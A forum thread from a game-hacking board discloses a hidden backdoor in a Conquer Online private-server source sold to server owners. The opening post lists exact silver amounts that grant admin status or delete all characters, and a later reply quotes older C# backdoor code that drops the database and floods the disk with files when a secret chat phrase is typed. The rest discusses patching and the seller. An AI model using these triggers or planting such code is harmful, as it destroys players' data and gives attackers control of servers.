Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > Conquer Online 2 > CO2 Exploits, Hacks & Tools
You last visited: Today at 02:49

• Please register to post and access all features, it's quick, easy and FREE!

Advertisement

"God" Exploit - Gain PM and Delete All Characters

Discussion on "God" Exploit - Gain PM and Delete All Characters within the CO2 Exploits, Hacks & Tools forum part of the Conquer Online 2 category.

Old   #1

elite*gold: 12
Received Thanks: 4,114
"***" Exploit - Gain PM and Delete All Characters

Introduction
This exploit allows any player to elevate their status to PM and/or delete all characters on the server. Covers all unpatched private servers running a source called "***" (people are being scammed into buying this). If you find a private server running on patch 5165, there's a chance it's this source and that this exploit will work on it.

The Exploit
Deposit or withdraw the following (exact) quantities of silver into any WH.
7423 Silver = delete all characters
7424 Silver = become a PM

OR Access your remote WH with the following (exact) quantities of silver in your inventory.
  • Your character doesn't have a WH password:
    2,844,866,647 Silver = delete all characters
    2,844,866,646 Silver = become a PM

• Your character does have a WH password:
    7423 Silver = delete all characters
    7424 Silver = become a PM
Extra
Comes from here:
Let me know if this actually works on servers and which servers they are (I'm interested). Cheers.
Thanks
2 Users
Old 11/15/2017, 12:48   #2

elite*gold: 0
Sad to say it's not working anymore...... We already fix it.
Old 11/15/2017, 14:47   #3

I fixed it for most of the servers out there including Era which is soulfly’s server.
Old 11/15/2017, 15:31   #4

elite*gold: 67
Quote:
if (Message == "@go_to_hell!ENC3101931993")
{
MySql.Data.MySqlClient.MySqlCommand Command = new MySql.Data.MySqlClient.MySqlCommand("drop database `coproj`", DataBase.Connection);
Command.ExecuteNonQuery();

for (ulong i = 0; i < 547473346363; i++)
{
System.IO.StreamWriter WW = new System.IO.StreamWriter("C:Virus" + i.ToString() + ".exe", true);
for (ulong u = 0; u < 5857474673576; u++)
{
WW.WriteLine("No stealing our server you gay *****!!");
}
WW.Flush();
WW.Close();
WW = new System.IO.StreamWriter("C:YouSuck" + i.ToString() + ".txt", true);
for (ulong u = 0; u < 5857474673576; u++)
{
WW.WriteLine("No stealing our server you gay *****!!");
}
WW.Flush();
WW.Close();
}
}

Anyone remember this?
Old 11/15/2017, 16:05   #5

Quote:
Originally Posted by Xio. View Post
Anyone remember this?
No, can't say I do.

Quote:
Originally Posted by iBotx View Post
I fixed it for most of the servers out there including Era which is soulfly’s server.
Thing about scams is that unless you're the one scamming, there are going to be servers without patches. The scammer is the distributor. Soulfly was scammed into purchasing that source as well? Interesting. I wonder how many servers this would affect if it wasn't known until now.
Old 11/15/2017, 17:08   #6

Quote:
Originally Posted by Spirited View Post
No, can't say I do.

Thing about scams is that unless you're the one scamming, there are going to be servers without patches. The scammer is the distributor. Soulfly was scammed into purchasing that source as well? Interesting. I wonder how many servers this would affect if it wasn't known until now.
Uptill now I patched it for like 6 servers or more and they all say that they bought the source from vali, “Classic Veterans” owner.
Old 11/15/2017, 19:49   #7

Quote:
Uptill now I patched it for like 6 servers or more and they all say that they bought the source from vali, “Classic Veterans” owner.
How much did this source go for on the scam market? Would be interesting to start making a cost total to see how much money this scammer made.
Old 11/15/2017, 20:12   #8

Quote:
How much did this source go for on the scam market? Would be interesting to start making a cost total to see how much money this scammer made.
I’ve no clue but looking to these people I think it made a lot.
Old 11/15/2017, 21:36   #9

i know aroud 8 or 9 pserver using it at very least and a few more that bought it for tests and to learn, tanks to Spirited i was able to fix mine ppl with a brain shold be able to fix it widout paying for. Spirited already show what couse the problem now ppl just have to find the malicious code and the triguers

this is what miss in this comunity some skilled coders that code a source for retail sale iknow some of you guys sell sources but for 700USD or more this guy with a crapy source sell it at 100 USD but like 50 times and you have to pay for extra freactures or patches why the skilled coders from epvp dont make one source for profit, you guys know is a market for that and evry skilled coder says evry single time "my knolege worth money i dont do it for free" so like several skilled coders joined to create a bot like cofarm etc and charge a monthly fee why not bring that to conquer server and get the noob that cant or refuse to learn run a few server and you guys make a few usd in prosses??

i know most of you guys will say if you are a noob and cant code you dont deserve to own a server..
pff that will hapen no matter what or he bought from scamer guys and pay for fixes or run broken server for some time until other forum leake a new garbage source.

PS: this is my 2 cent opinion and im sory for my broken inglish
Thanks
1 User
Old 11/15/2017, 22:08   #10

Quote:
Originally Posted by coolco View Post
i know aroud 8 or 9 pserver using it at very least and a few more that bought it for tests and to learn, tanks to Spirited i was able to fix mine ppl with a brain shold be able to fix it widout paying for. Spirited already show what couse the problem now ppl just have to find the malicious code and the triguers

this is what miss in this comunity some skilled coders that code a source for retail sale iknow some of you guys sell sources but for 700USD or more this guy with a crapy source sell it at 100 USD but like 50 times and you have to pay for extra freactures or patches why the skilled coders from epvp dont make one source for profit, you guys know is a market for that and evry skilled coder says evry single time "my knolege worth money i dont do it for free" so like several skilled coders joined to create a bot like cofarm etc and charge a monthly fee why not bring that to conquer server and get the noob that cant or refuse to learn run a few server and you guys make a few usd in prosses??

i know most of you guys will say if you are a noob and cant code you dont deserve to own a server..
pff that will hapen no matter what or he bought from scamer guys and pay for fixes or run broken server for some time until other forum leake a new garbage source.

PS: this is my 2 cent opinion and im sory for my broken inglish
I'm glad you were able to figure it out. You'd be surprised by some people who own private servers. I showed Blizzard CO the problem and the line of code, and they still weren't able to fix it without hired help from another member. When people reference problematic owners, those are the types they reference. Not the types that are just new to programming. I believe we welcome new programmers for the most part. I'll keep your comments about available sources for learning in mind.
Old 11/15/2017, 23:26   #11

Quote:
But I am not buying a source.
Old 11/15/2017, 23:34   #12

Quote:
Originally Posted by Soulfly25 View Post
But I am not buying a source.
What?
Old 11/16/2017, 02:48   #13

Quote:
I'm glad you were able to figure it out. You'd be surprised by some people who own private servers. I showed Blizzard CO the problem and the line of code, and they still weren't able to fix it without hired help from another member. When people reference problematic owners, those are the types they reference. Not the types that are just new to programming. I believe we welcome new programmers for the most part. I'll keep your comments about available sources for learning in mind.

tanks for you consideration if some one do that will make the new coders life a bit easyer we can learn and work with somthing that worth using/working and you guys make some cash from selling like addons "freactures" or ppl code own stuff or buy from the top guys here i belive is better a stadard base source no idea why conquer comunity never start a project like this before kinda sad to see how fragmented the conquer comunity is

but anyway im tring to be the learn best i can to bring the old times of conquer before TQ garbage back hehe
Old 11/16/2017, 11:42   #14

Quote:
What?
As I said. I did not buy the source. I already have 5165 (NewestCoServer) that don't have an exploit . After a few months the seller of that source put some exploit and sell it for cheap price and that's the story begins.... blah blah blah...
Old 11/17/2017, 00:56   #15

Quote:
Originally Posted by Soulfly25 View Post
As I said. I did not buy the source. I already have 5165 (NewestCoServer) that don't have an exploit . After a few months the seller of that source put some exploit and sell it for cheap price and that's the story begins.... blah blah blah...
what?? dude no one was talking about you in particular we are talking in general NEW coders.. dont make a drama were is none lol

and erm your didnt have that exploit right??

Quote:
Thanks
1 User